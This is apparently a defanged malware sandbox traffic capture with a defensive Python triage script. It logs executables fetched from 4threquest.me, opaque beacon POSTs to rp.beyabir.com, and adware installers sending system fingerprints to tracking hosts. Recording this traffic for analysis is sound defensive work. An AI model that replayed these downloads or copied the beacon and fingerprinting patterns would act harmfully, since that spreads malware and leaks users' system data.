Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1985320
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
[response body: Windows PE executable, 1985320 bytes, with the same MZ/PE header bytes as the 310714_cr.exe body above (MZ stub, Rich header, PE signature, .text and .rdata sections visible); binary dump omitted]
<<< skipped >>>
GET /310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/octet-stream
Content-Length: 1112422
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
[response body: Windows PE executable, 1112422 bytes, with the same MZ/PE header bytes as the 310714_cr.exe body above (MZ stub, Rich header, PE signature, .text and .rdata sections visible); binary dump omitted]
<<< skipped >>>
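The three NSIS_Inetc downloads above are served as application/octet-stream or application/force-download, and the bodies begin with an MZ stub and a PE signature; the POSTs to rp.beyabir.com further down carry opaque binary bodies. Triage that trusts Content-Type misses both. The following is an added example for this report, not Lavasoft MAS code: it splits a raw HTTP message carved from a capture, sniffs the body by content (MZ/e_lfanew/PE check, image and archive magics, UTF-8 decodability, Shannon entropy) and returns findings. The sample messages are constructed: their headers mirror the capture, the PE body is a minimal MZ/PE skeleton rather than a real program, and the image/png-labelled case is a hypothetical generalization that does not occur in this dump.

```python
"""Classify HTTP bodies carved from a capture by content rather than by header.

Added example for this report (not Lavasoft MAS code). Sample messages are
constructed stand-ins modelled on the exchanges in the dump.
"""
import math
import struct
from collections import Counter

MAGICS = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x1f\x8b", "gzip"),
    (b"PK\x03\x04", "zip"),
]
EXECUTABLE_TYPES = ("application/octet-stream", "application/x-msdownload",
                    "application/force-download")


def split_http_message(raw: bytes):
    """Return (start_line, headers, body); header names lower-cased, last value wins."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    start, *lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def is_pe(body: bytes) -> bool:
    """True if body has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum (uniformly distributed bytes)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_body(body: bytes) -> str:
    if is_pe(body):
        return "pe"
    for magic, name in MAGICS:
        if body.startswith(magic):
            return name
    try:
        body.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "opaque-binary" if shannon_entropy(body) > 7.0 else "binary"


def triage(raw: bytes) -> dict:
    """Sniff one HTTP message and list the findings an analyst would want flagged."""
    start, headers, body = split_http_message(raw)
    kind = classify_body(body)
    declared = headers.get("content-type", "")
    findings = []
    if kind == "pe":
        findings.append("executable body")
        if not declared.startswith(EXECUTABLE_TYPES):
            findings.append(f"content-type {declared!r} does not declare an executable")
    if kind == "opaque-binary" and start.startswith("POST "):
        findings.append("high-entropy POST body")   # typical of encrypted or compressed beacons
    return {"start_line": start, "declared": declared, "sniffed": kind,
            "entropy": round(shannon_entropy(body), 2), "findings": findings}


def tiny_pe() -> bytes:
    """Constructed MZ/PE skeleton: 64-byte DOS header, e_lfanew = 0x40, PE signature."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + b"\0" * 20


# Constructed samples: headers modelled on the capture, bodies synthetic.
SAMPLE_DOWNLOAD = (
    b"HTTP/1.1 200 OK\r\nServer: nginx/1.0.15\r\n"
    b"Content-Type: application/octet-stream\r\nAccept-Ranges: bytes\r\n\r\n"
) + tiny_pe()
SAMPLE_BEACON = (
    b"POST /?pcrc=236440515&v=2.0 HTTP/1.1\r\nHost: rp.beyabir.com\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    b"Content-Length: 256\r\n\r\n"
) + bytes(range(256))      # stand-in for the opaque body: uniform bytes, entropy 8.0
SAMPLE_MISLABELLED = (      # hypothetical: PE served under an image type
    b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n\r\n"
) + tiny_pe()

if __name__ == "__main__":
    for sample in (SAMPLE_DOWNLOAD, SAMPLE_BEACON, SAMPLE_MISLABELLED):
        print(triage(sample))
```

The entropy threshold of 7.0 bits per byte is a working assumption chosen here; compressed images also score high, which is why the magic checks run first and the high-entropy flag is only raised for request bodies.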
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
[gzip-compressed chunked HTML body (first chunk 0x18 bytes); binary omitted]
GET /img/Global/Yes_Button.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: FufJylo2h0LlgAvBhv6FKeS8RiEbjEd6iaXEFUTvT/OyG ZgeEaS5ooHNe8/F0Le
x-amz-request-id: 69875246E7628FFF
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503006
Last-Modified: Wed, 13 Nov 2013 16:12:48 GMT
x-amz-version-id: .ffwqW.8iCK2_zdeBNvgWdy.OnUDjeHF
ETag: "3f27a393967d84f83a317f40351c0065"
Accept-Ranges: bytes
[response body: PNG image, 1091 bytes, carrying an XMP packet (xmp:CreatorTool "Adobe Photoshop CS6 (Windows)", xmpMM:DocumentID xmp.did:2D2B0E0A24EA11E392EFCCF1BDECC388, xmpMM:InstanceID xmp.iid:2D2B0E0924EA11E392EFCCF1BDECC388); binary omitted]
<<< skipped >>>
GET /img/Global/Yes_Button_Hover.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1094
Connection: keep-alive
x-amz-id-2: ZH/H/BrlB90f12Jgses7dcqPxryj5NnMS0cI2SxwLBB85Qfj2OXlGAsGTEDmcFC7
x-amz-request-id: 91A6ABE35D0A7569
x-amz-meta-s3fox-filesize: 1094
x-amz-meta-s3fox-modifiedtime: 1380713503000
Last-Modified: Wed, 13 Nov 2013 16:12:44 GMT
x-amz-version-id: L9RQqPthtuNtMC55hxM9o_RZqWXqZtid
ETag: "aec475b9d6280598800f3ceafea4af8c"
Accept-Ranges: bytes
[response body: PNG image, 1094 bytes, carrying an XMP packet (xmp:CreatorTool "Adobe Photoshop CS6 (Windows)", xmpMM:DocumentID xmp.did:30B2AE2824EA11E392EFCCF1BDECC388, xmpMM:InstanceID xmp.iid:30B2AE2724EA11E392EFCCF1BDECC388); binary omitted]
<<< skipped >>>
GET /img/Global/No_Button_Hover.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: w8MZLmVYoBIXBjhf7AX2 gI11HEATjoL7xzl5WiqPif2jl7PuO2tfCE3vWAz3tzG
x-amz-request-id: E9FC3602133605A0
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503004
Last-Modified: Wed, 13 Nov 2013 16:12:47 GMT
x-amz-version-id: wNmfJwpUmazhRatL.BZxBG0x.XZldhEV
ETag: "6d55a62314755c1454569b2b098a3a9f"
Accept-Ranges: bytes
[response body: PNG image, 1091 bytes, carrying an XMP packet (xmp:CreatorTool "Adobe Photoshop CS6 (Windows)", xmpMM:DocumentID xmp.did:30B2AE2424EA11E392EFCCF1BDECC388, xmpMM:InstanceID xmp.iid:30B2AE2324EA11E392EFCCF1BDECC388); binary omitted]
<<< skipped >>>
GET /img/Rerarapepe/logo.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 10944
Connection: keep-alive
x-amz-id-2: fttMRbWgO3QO0vLVbufMGrfOzBMWbPdneAkQOk8G/aPTYMrgBtiQS33MCTm hCu0
x-amz-request-id: 1D23872D552BD286
x-amz-meta-s3fox-filesize: 10944
x-amz-meta-s3fox-modifiedtime: 1384099835051
Last-Modified: Tue, 12 Nov 2013 11:05:48 GMT
x-amz-version-id: bDPFTNRsfueKXbAbmeVgRbPvzBoRvTw2
ETag: "0440e25b659207aaea00512d9a0a9924"
Accept-Ranges: bytes
[response body: PNG image, 10944 bytes, no readable metadata; binary omitted]
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/jpeg
Content-Length: 15799
Connection: keep-alive
x-amz-id-2: v/KJyRQPRqGzp68fMREpMsXVlN8ZGENjPJZ3xLLc6RX9mf6LfR53urxF4AogH8OE
x-amz-request-id: 10317CBB850CD0F8
x-amz-meta-s3fox-filesize: 15799
x-amz-meta-s3fox-modifiedtime: 1394538949746
Last-Modified: Tue, 11 Mar 2014 11:56:45 GMT
x-amz-version-id: zPl9IpmeaG3ff3qZpgvUQzMtoydG8QKH
ETag: "3e2809731062d36b6ae81e70aef3b785"
Accept-Ranges: bytes
[response body: JPEG image, 15799 bytes, with Exif (little-endian TIFF header, "Ducky" segment) and an XMP packet (xmp:CreatorTool "Adobe Photoshop CS6 (Windows)", xmpMM:OriginalDocumentID xmp.did:F7DDEC055CA8E311B43CF856625B69D6, xmpMM:DocumentID xmp.did:08AEC486A91411E3A978EB316F7617DC, xmpMM:InstanceID xmp.iid:08AEC485A91411E3A978EB316F7617DC); binary omitted]
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe_b.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 5163
Connection: keep-alive
x-amz-id-2: AjQL4y8fLzMBXjBcq1riQXu6lrQMz5eIxeZcrvBO8swbGl1434gYRzLcefkTkD6R
x-amz-request-id: D515F0C8C6C1D704
x-amz-meta-s3fox-filesize: 5163
x-amz-meta-s3fox-modifiedtime: 1402217717749
Last-Modified: Mon, 09 Jun 2014 14:41:12 GMT
x-amz-version-id: KNAPX8e2AxH1Bx9jEBmu7jKCGa_97Tvk
ETag: "297eebd38313ee5b5ce0639f28ef2690"
Accept-Ranges: bytes
[response body: PNG image, 5163 bytes; the captured fragment starts mid-stream (no PNG signature), runs to the IEND chunk and is repeated once in the dump; binary omitted]
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 update "}
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 update "}
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.66 ms","message":"store 1 action and 0 update "}
GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:53 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=122104, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:54:04 GMT
Expires: Sat, 02 May 2015 10:54:04 GMT
ETag: "f8b69e2088ce500f8a2cd23376edbe2b1529a5ce"
Content-Length: 1810
Connection: close
Content-Type: application/ocsp-response
[DER-encoded OCSP response, 1810 bytes; binary omitted. Fields readable in the dump: responder "Go Daddy Validation Authority - G2" (C=US, ST=Arizona, L=Scottsdale, O=GoDaddy Inc.), producedAt 2015-04-30 22:54:04Z, one SingleResponse carrying the GeneralizedTime values 2015-03-01 02:22:09Z, 2015-04-30 22:54:04Z (thisUpdate) and 2015-05-02 10:54:04Z (nextUpdate). Three time values after the CertID is the layout of a revoked status (revocationTime and reason, then thisUpdate/nextUpdate); a good status carries only two, so this response most likely reports the queried certificate as revoked since 2015-03-01. This is an inference from the byte layout and should be confirmed by decoding the full body. The embedded responder certificate was issued by "Go Daddy Secure Certificate Authority - G2" (CRL hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl) and is valid from 2015-03-16 07:00:00Z to 2016-03-16 07:00:00Z.]
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Content-Length: 969
Date: Thu, 30 Apr 2015 23:11:51 GMT
Connection: keep-alive
[response body: DER-encoded X.509 certificate, 969 bytes: self-signed "Go Daddy Root Certificate Authority - G2" (C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc.), notBefore 2009-09-01 00:00:00Z, notAfter 2037-12-31 23:59:59Z. The file name in the URL is the certificate's SHA-1 thumbprint, which is how ctldl.windowsupdate.com serves roots for the automatic root update. Binary and a repeated copy of the headers omitted]
<<< skipped >>>
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.15</center>
</body>
</html>
POST /?pcrc=236440515&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 864
Cache-Control: no-cache
[opaque binary POST body, 864 bytes; omitted]
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=1901405883&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 1200
Cache-Control: no-cache
[opaque binary POST body, 1200 bytes; omitted]
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=718955205&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
[opaque binary POST body, 672 bytes; omitted]
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=629602451&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
[opaque binary POST body, 672 bytes; omitted]
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=688063635&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=216881437&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2352
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
POST /?pcrc=1431802907&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2256
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=489793, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 15:15:07 GMT
Expires: Wed, 6 May 2015 15:15:07 GMT
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
GET /v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 update "}
GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:12:18 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119989, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:17:23 GMT
Expires: Sat, 02 May 2015 10:17:23 GMT
ETag: "c0773ca97a9364f110e8a1925adda329f5e6c722"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
POST /tdownload.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Host: VVV.lawfuldownload.com
version=1.1.2.41&s1=5844fe1867a9e3700b6c2f6fc517337ccbd4629e&t1=1430435409&campid=9664&prefix=amisetup2899
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup2899__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 30 Apr 2015 23:07:10 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup2899__9664.exe
Content-Length: 870912
Connection: keep-alive
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 333
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.0.30319&OSversion=NT6.1SP1&Slv=&Sysid=915A4028688142931B5DDA64A4540CAD&Sysid1=066389C9740F80692FC30C6511692204&X64=Y&admin=Y&browser=IE.HTTP&cavp=&chver=35.0.1916.153&ci=9664&exe=amisetup2899__9664&ffver=29.0.1.5239&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1430435233&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
